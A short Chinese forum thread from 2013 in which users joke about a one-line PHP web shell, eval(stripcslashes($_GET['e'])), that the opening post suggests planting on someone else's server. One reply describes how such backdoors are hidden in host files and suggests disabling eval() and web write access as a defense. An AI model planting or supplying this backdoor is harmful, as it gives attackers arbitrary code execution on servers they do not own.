放到别人服务器,攻击性的大小就由你自己决定了。
<?php
eval(stripcslashes($_GET['e']));
http://www.oschina.net/code/snippet_173183_13710
我看了笑了~~~
<?php
eval(stripcslashes($_GET['e']));
http://www.oschina.net/code/snippet_173183_13710
我看了笑了~~~
1
for4 Jan 2, 2013
笑点在哪里..~?
|
3
tempdban Jan 2, 2013 via Android
确实啊写完楼都垮了
|
5
enj0y Jan 2, 2013
更多的做法是将一句话混淆隐藏在宿主PHP或者其它文件里,接受到事先备好的电话号指令后释放出来。防不胜防啊!想禁一句话,最好的办法是禁eval()和使用外部储存服务,然后关闭本地WEB写权限。
至于OSC上面的,烧主板、堵厕所嘛的,全是恶搞。 |